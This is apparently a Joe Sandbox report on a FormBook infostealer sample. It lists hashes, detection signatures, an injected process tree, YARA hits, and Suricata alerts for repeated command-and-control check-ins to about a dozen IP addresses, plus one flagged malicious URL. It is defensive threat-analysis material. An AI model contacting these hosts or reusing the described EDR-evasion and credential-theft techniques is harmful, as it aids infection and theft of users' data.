Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NWPZbNcRxL.exe

Overview

General Information

Sample name:NWPZbNcRxL.exe
renamed because original name is a hash value
Original sample name:05cddefc8992523851a932ec1420caf380bd0907ac51d8e8b2a8b41027781c96.exe
Analysis ID:1587671
MD5:37148a3441bcc11c173f13e149c7284b
SHA1:ad8b541688375bf90cb89eeb94bc8262508401f4
SHA256:05cddefc8992523851a932ec1420caf380bd0907ac51d8e8b2a8b41027781c96
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • NWPZbNcRxL.exe (PID: 2920 cmdline: "C:\Users\user\Desktop\NWPZbNcRxL.exe" MD5: 37148A3441BCC11C173F13E149C7284B)
    • svchost.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\NWPZbNcRxL.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WnOFOMnqmLQAP.exe (PID: 3572 cmdline: "C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • logman.exe (PID: 2884 cmdline: "C:\Windows\SysWOW64\logman.exe" MD5: AE108F4DAAB2DD68470AC41F91A7A4E9)
          • WnOFOMnqmLQAP.exe (PID: 2412 cmdline: "C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3292 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\NWPZbNcRxL.exe", CommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", ParentImage: C:\Users\user\Desktop\NWPZbNcRxL.exe, ParentProcessId: 2920, ParentProcessName: NWPZbNcRxL.exe, ProcessCommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", ProcessId: 3648, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\NWPZbNcRxL.exe", CommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", ParentImage: C:\Users\user\Desktop\NWPZbNcRxL.exe, ParentProcessId: 2920, ParentProcessName: NWPZbNcRxL.exe, ProcessCommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", ProcessId: 3648, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T16:41:48.012262+010020507451Malware Command and Control Activity Detected192.168.2.549904154.213.39.6680TCP
                2025-01-10T16:42:11.421639+010020507451Malware Command and Control Activity Detected192.168.2.54998046.38.243.23480TCP
                2025-01-10T16:42:33.077627+010020507451Malware Command and Control Activity Detected192.168.2.549984209.74.79.4280TCP
                2025-01-10T16:42:47.377173+010020507451Malware Command and Control Activity Detected192.168.2.54998847.254.140.25580TCP
                2025-01-10T16:43:01.013291+010020507451Malware Command and Control Activity Detected192.168.2.54999285.159.66.9380TCP
                2025-01-10T16:43:14.364425+010020507451Malware Command and Control Activity Detected192.168.2.549996188.114.97.380TCP
                2025-01-10T16:43:35.832142+010020507451Malware Command and Control Activity Detected192.168.2.550000199.59.243.22880TCP
                2025-01-10T16:43:49.757481+010020507451Malware Command and Control Activity Detected192.168.2.550004208.91.197.2780TCP
                2025-01-10T16:44:03.381007+010020507451Malware Command and Control Activity Detected192.168.2.550008136.243.64.14780TCP
                2025-01-10T16:44:24.662228+010020507451Malware Command and Control Activity Detected192.168.2.550012104.21.48.180TCP
                2025-01-10T16:44:47.149248+010020507451Malware Command and Control Activity Detected192.168.2.550016134.122.133.8080TCP
                2025-01-10T16:45:00.493092+010020507451Malware Command and Control Activity Detected192.168.2.55002093.127.192.20180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T16:41:48.012262+010028554651A Network Trojan was detected192.168.2.549904154.213.39.6680TCP
                2025-01-10T16:42:11.421639+010028554651A Network Trojan was detected192.168.2.54998046.38.243.23480TCP
                2025-01-10T16:42:33.077627+010028554651A Network Trojan was detected192.168.2.549984209.74.79.4280TCP
                2025-01-10T16:42:47.377173+010028554651A Network Trojan was detected192.168.2.54998847.254.140.25580TCP
                2025-01-10T16:43:01.013291+010028554651A Network Trojan was detected192.168.2.54999285.159.66.9380TCP
                2025-01-10T16:43:14.364425+010028554651A Network Trojan was detected192.168.2.549996188.114.97.380TCP
                2025-01-10T16:43:35.832142+010028554651A Network Trojan was detected192.168.2.550000199.59.243.22880TCP
                2025-01-10T16:43:49.757481+010028554651A Network Trojan was detected192.168.2.550004208.91.197.2780TCP
                2025-01-10T16:44:03.381007+010028554651A Network Trojan was detected192.168.2.550008136.243.64.14780TCP
                2025-01-10T16:44:24.662228+010028554651A Network Trojan was detected192.168.2.550012104.21.48.180TCP
                2025-01-10T16:44:47.149248+010028554651A Network Trojan was detected192.168.2.550016134.122.133.8080TCP
                2025-01-10T16:45:00.493092+010028554651A Network Trojan was detected192.168.2.55002093.127.192.20180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T16:42:03.773478+010028554641A Network Trojan was detected192.168.2.54997746.38.243.23480TCP
                2025-01-10T16:42:06.316926+010028554641A Network Trojan was detected192.168.2.54997846.38.243.23480TCP
                2025-01-10T16:42:08.872985+010028554641A Network Trojan was detected192.168.2.54997946.38.243.23480TCP
                2025-01-10T16:42:25.130232+010028554641A Network Trojan was detected192.168.2.549981209.74.79.4280TCP
                2025-01-10T16:42:27.942811+010028554641A Network Trojan was detected192.168.2.549982209.74.79.4280TCP
                2025-01-10T16:42:30.510802+010028554641A Network Trojan was detected192.168.2.549983209.74.79.4280TCP
                2025-01-10T16:42:38.768920+010028554641A Network Trojan was detected192.168.2.54998547.254.140.25580TCP
                2025-01-10T16:42:41.318777+010028554641A Network Trojan was detected192.168.2.54998647.254.140.25580TCP
                2025-01-10T16:42:43.936914+010028554641A Network Trojan was detected192.168.2.54998747.254.140.25580TCP
                2025-01-10T16:42:54.180791+010028554641A Network Trojan was detected192.168.2.54998985.159.66.9380TCP
                2025-01-10T16:42:56.724353+010028554641A Network Trojan was detected192.168.2.54999085.159.66.9380TCP
                2025-01-10T16:42:59.270659+010028554641A Network Trojan was detected192.168.2.54999185.159.66.9380TCP
                2025-01-10T16:43:06.731143+010028554641A Network Trojan was detected192.168.2.549993188.114.97.380TCP
                2025-01-10T16:43:09.258140+010028554641A Network Trojan was detected192.168.2.549994188.114.97.380TCP
                2025-01-10T16:43:11.874048+010028554641A Network Trojan was detected192.168.2.549995188.114.97.380TCP
                2025-01-10T16:43:28.215881+010028554641A Network Trojan was detected192.168.2.549997199.59.243.22880TCP
                2025-01-10T16:43:30.730742+010028554641A Network Trojan was detected192.168.2.549998199.59.243.22880TCP
                2025-01-10T16:43:33.321105+010028554641A Network Trojan was detected192.168.2.549999199.59.243.22880TCP
                2025-01-10T16:43:41.665841+010028554641A Network Trojan was detected192.168.2.550001208.91.197.2780TCP
                2025-01-10T16:43:44.195904+010028554641A Network Trojan was detected192.168.2.550002208.91.197.2780TCP
                2025-01-10T16:43:46.727809+010028554641A Network Trojan was detected192.168.2.550003208.91.197.2780TCP
                2025-01-10T16:43:55.714507+010028554641A Network Trojan was detected192.168.2.550005136.243.64.14780TCP
                2025-01-10T16:43:58.233396+010028554641A Network Trojan was detected192.168.2.550006136.243.64.14780TCP
                2025-01-10T16:44:00.768784+010028554641A Network Trojan was detected192.168.2.550007136.243.64.14780TCP
                2025-01-10T16:44:17.106873+010028554641A Network Trojan was detected192.168.2.550009104.21.48.180TCP
                2025-01-10T16:44:19.551968+010028554641A Network Trojan was detected192.168.2.550010104.21.48.180TCP
                2025-01-10T16:44:22.133759+010028554641A Network Trojan was detected192.168.2.550011104.21.48.180TCP
                2025-01-10T16:44:39.499291+010028554641A Network Trojan was detected192.168.2.550013134.122.133.8080TCP
                2025-01-10T16:44:42.073026+010028554641A Network Trojan was detected192.168.2.550014134.122.133.8080TCP
                2025-01-10T16:44:44.612294+010028554641A Network Trojan was detected192.168.2.550015134.122.133.8080TCP
                2025-01-10T16:44:52.908231+010028554641A Network Trojan was detected192.168.2.55001793.127.192.20180TCP
                2025-01-10T16:44:55.411921+010028554641A Network Trojan was detected192.168.2.55001893.127.192.20180TCP
                2025-01-10T16:44:57.944992+010028554641A Network Trojan was detected192.168.2.55001993.127.192.20180TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://www.f5jh81t3k1w8.sbs/blfv/?Bb6h7=gBiPvnrHa&V8=OYzX9ZD8JFvHop8tcVV8HuyU67NFgrHF6vfAGJLgGhZlSUdZ/OYKAWfRY9pPenrbZbnckt/3jffsXR68PKDW9Ecs4jeXW699fOhXXOdveN0uJ+M8ggMhXVa/XAWEfUcQVw==Avira URL Cloud: Label: malware
                Source: NWPZbNcRxL.exeReversingLabs: Detection: 71%
                Source: NWPZbNcRxL.exeVirustotal: Detection: 45%Perma Link
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417341861.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4504631608.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417817350.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: NWPZbNcRxL.exeJoe Sandbox ML: detected
                Source: NWPZbNcRxL.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: logman.pdb source: svchost.exe, 00000002.00000003.2384783165.0000000003232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384691800.000000000321B000.00000004.00000020.00020000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504092986.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WnOFOMnqmLQAP.exe, 00000004.00000002.4503538200.000000000008E000.00000002.00000001.01000000.00000005.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2483941200.000000000008E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: NWPZbNcRxL.exe, 00000000.00000003.2061708811.0000000003850000.00000004.00001000.00020000.00000000.sdmp, NWPZbNcRxL.exe, 00000000.00000003.2061525090.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322396979.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320241917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003900000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2417406704.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2419688042.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.0000000003110000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: NWPZbNcRxL.exe, 00000000.00000003.2061708811.0000000003850000.00000004.00001000.00020000.00000000.sdmp, NWPZbNcRxL.exe, 00000000.00000003.2061525090.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2322396979.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320241917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003900000.00000040.00001000.00020000.00000000.sdmp, logman.exe, logman.exe, 00000005.00000003.2417406704.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2419688042.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.0000000003110000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: logman.exe, 00000005.00000002.4503848678.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.000000000373C000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484612545.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2705213273.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: logman.pdbGCTL source: svchost.exe, 00000002.00000003.2384783165.0000000003232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384691800.000000000321B000.00000004.00000020.00020000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504092986.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: logman.exe, 00000005.00000002.4503848678.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.000000000373C000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484612545.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2705213273.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7445A
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7C6D1 FindFirstFileW,FindClose,0_2_00C7C6D1
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C7C75C
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7EF95
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7F0F2
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7F3F3
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C737EF
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C73B12
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7BCBC
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0274C640 FindFirstFileW,FindNextFileW,FindClose,5_2_0274C640
                Source: C:\Windows\SysWOW64\logman.exeCode function: 4x nop then xor eax, eax5_2_02739F20
                Source: C:\Windows\SysWOW64\logman.exeCode function: 4x nop then mov ebx, 00000004h5_2_02F604DE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49904 -> 154.213.39.66:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49904 -> 154.213.39.66:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49977 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49984 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49984 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50004 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49996 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49988 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50012 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 134.122.133.80:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 93.127.192.201:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50020 -> 93.127.192.201:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 93.127.192.201:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 93.127.192.201:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 134.122.133.80:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50000 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49980 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49980 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50008 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50016 -> 134.122.133.80:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 134.122.133.80:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49992 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 104.21.48.1:80
